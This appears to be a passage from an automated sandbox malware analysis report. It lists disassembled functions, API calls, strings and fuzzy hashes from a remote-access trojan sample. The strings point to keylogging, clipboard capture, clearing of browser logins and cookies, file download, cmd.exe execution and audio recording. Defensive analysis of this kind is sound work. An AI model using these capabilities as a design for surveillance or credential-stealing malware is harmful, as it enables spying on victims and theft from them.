                                  • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                  • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                  Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                  • String ID: !D@
                                  • API String ID: 3446828153-604454484
                                  • Opcode ID: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                  • Opcode Fuzzy Hash: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                  Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell
                                  • String ID: /C $cmd.exe$open
                                  • API String ID: 587946157-3896048727
                                  • Opcode ID: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                  • Opcode Fuzzy Hash: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                  Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetLastInputInfo$User32.dll
                                  • API String ID: 2574300362-1519888992
                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                  Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                  • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                  Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                  • API String ID: 3472027048-1236744412
                                  • Opcode ID: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                  • Opcode Fuzzy Hash: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                  Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$SleepText$ForegroundLength
                                  • String ID: [ $ ]
                                  • API String ID: 3309952895-93608704
                                  • Opcode ID: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                  • Opcode Fuzzy Hash: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                  Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                  • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                  Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                  • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                  Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                  • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 3919263394-0
                                  • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                  • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                  Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleOpenProcess
                                  • String ID:
                                  • API String ID: 39102293-0
                                  • Opcode ID: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                  • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                  • Opcode Fuzzy Hash: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                  • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                  Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                  • String ID:
                                  • API String ID: 2633735394-0
                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                  Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                  • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                  • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                  • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MetricsSystem
                                  • String ID:
                                  • API String ID: 4116985748-0
                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                  Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                  • String ID:
                                  • API String ID: 1761009282-0
                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                  Function 00449EBC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                  • GetLastError.KERNEL32 ref: 00449FAB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide
                                  • String ID: PkGNG
                                  • API String ID: 203985260-263838557
                                  • Opcode ID: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                  • Instruction ID: e4919e29a80df6b7ced925805d10dfcffaa1b378e184719e11b938f1b8f94c7b
                                  • Opcode Fuzzy Hash: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                  • Instruction Fuzzy Hash: 2331E430200201ABFB21EF56C845BAB7768EF45721F15016BF815C7391DB38CD45E7A9
                                  Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Init_thread_footer__onexit
                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                  • API String ID: 1881088180-3686566968
                                  • Opcode ID: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                  • Opcode Fuzzy Hash: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                  Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ACP$OCP
                                  • API String ID: 0-711371036
                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                  Function 0044B7B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                  • GetLastError.KERNEL32 ref: 0044B884
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: PkGNG
                                  • API String ID: 442123175-263838557
                                  • Opcode ID: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                  • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                  • Opcode Fuzzy Hash: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                  • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                  Function 0044B6D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                  • GetLastError.KERNEL32 ref: 0044B796
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: PkGNG
                                  • API String ID: 442123175-263838557
                                  • Opcode ID: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                  • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                  • Opcode Fuzzy Hash: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                  • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                  Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                  Strings
                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID: KeepAlive | Enabled | Timeout:
                                  • API String ID: 481472006-1507639952
                                  • Opcode ID: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                  • Opcode Fuzzy Hash: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                  Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32 ref: 0041667B
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DownloadFileSleep
                                  • String ID: !D@
                                  • API String ID: 1931167962-604454484
                                  • Opcode ID: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                  • Opcode Fuzzy Hash: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                  Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: alarm.wav$hYG
                                  • API String ID: 1174141254-2782910960
                                  • Opcode ID: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                  • Opcode Fuzzy Hash: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                  Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                  • String ID: Online Keylogger Stopped
                                  • API String ID: 1623830855-1496645233
                                  • Opcode ID: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                  • Opcode Fuzzy Hash: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                  Function 00448C33 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String
                                  • String ID: LCMapStringEx$PkGNG
                                  • API String ID: 2568140703-1065776982
                                  • Opcode ID: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                  • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                  • Opcode Fuzzy Hash: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                  • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                  Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                  • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                  • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
